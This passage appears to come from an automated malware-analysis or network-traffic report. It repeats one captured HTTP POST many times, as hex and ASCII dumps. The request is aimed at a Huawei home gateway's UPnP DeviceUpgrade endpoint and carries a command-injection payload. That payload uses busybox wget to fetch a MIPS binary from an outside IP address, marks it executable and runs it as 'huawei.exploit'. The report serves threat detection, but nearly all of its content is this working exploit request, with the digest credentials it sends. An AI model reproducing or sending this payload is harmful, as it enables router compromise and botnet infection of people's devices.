/tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 